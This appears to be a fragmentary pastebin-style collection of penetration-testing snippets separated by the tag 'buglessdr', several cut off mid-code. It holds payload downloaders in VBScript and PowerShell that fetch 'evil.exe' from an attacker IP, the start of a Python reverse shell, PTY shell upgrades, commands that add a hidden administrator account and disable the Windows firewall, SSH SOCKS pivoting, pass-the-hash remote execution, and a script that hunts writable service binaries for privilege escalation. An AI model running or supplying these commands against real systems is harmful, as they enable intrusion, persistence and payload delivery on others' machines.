buglessdr

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs

buglessdr

#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'

#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443

#base64 decode a string
echo STRINGTODECODE | base64 --decode

#escape jail shell

buglessdr

#add a user
net user ryan mwcb /add

#add user to local administrators
net localgroup administrators /add ryan

#remove firewall
netsh firewall set opmode disable

#enabled remote desktop

buglessdr

##SOCKS Proxy##
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
#Command line:
ssh -D 127.0.0.1:1080 10.0.0.1

#~/.ssh/config:
Host 10.0.0.1
DynamicForward 127.0.0.1:1080

#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:

buglessdr

#!/usr/bin/python
# imports here
# Copyright 2012 TrustedSec, LLC. All rights reserved. 
#
# This piece of software code is licensed under the FreeBSD license..
#
# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information. 
import socket,subprocess
HOST = '192.168.12.45'    # The remote host
PORT = 443            # The same port as used by the server

buglessdr

echo $storageDir = $pwd > wget.ps1
echo $webclient = New‐Object System.Net.WebClient >>wget.ps1  
echo $url = "http://192.168.10.52:8000/evil.exe" >>wget.ps1
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

buglessdr

#!/usr/bin/python

import sys

def split_by_length(s,block_size):
    w=[]
    n=len(s)
    for i in range(0,n,block_size):
        w.append(s[i:i+block_size])
    if w[-1].isspace():

buglessdr

@echo off
REM Description: Script that queries all services and searches for exeuctables that give the Everyone group RW access.
REM Type: Incorrect file permissions
REM Note: The ^ characters escapes certain characters that break the FOR loop.
REM Note: tokens=1* - The value at the first delimeter and everything after. 
for /f "tokens=1*" %%m in ('sc query state^= all ^| find "SERVICE_NAME"') do (
    for /f "tokens=1* delims=: " %%r in ('sc qc "%%~n" ^| find "BINARY_PATH_NAME"') do (
        for /f "delims=" %%x in ('echo(%%~s^| findstr /L /V /I /C:"%SystemRoot%\System32" /C:"%SystemRoot%\SysWOW64"') do (
            icacls "%%~x"
        )

buglessdr

#!/bin/bash
TARGET=$1
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view"

buglessdr

<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
	<Name>MyModule</Name>
	<Version>1.0.0</Version>
	<Vendor>My Module</Vendor>
	<URL>http://otrs.org/</URL>
	<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
	<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
	<Description Lang="en">MyModule</Description>
	<Framework>5.x.x</Framework>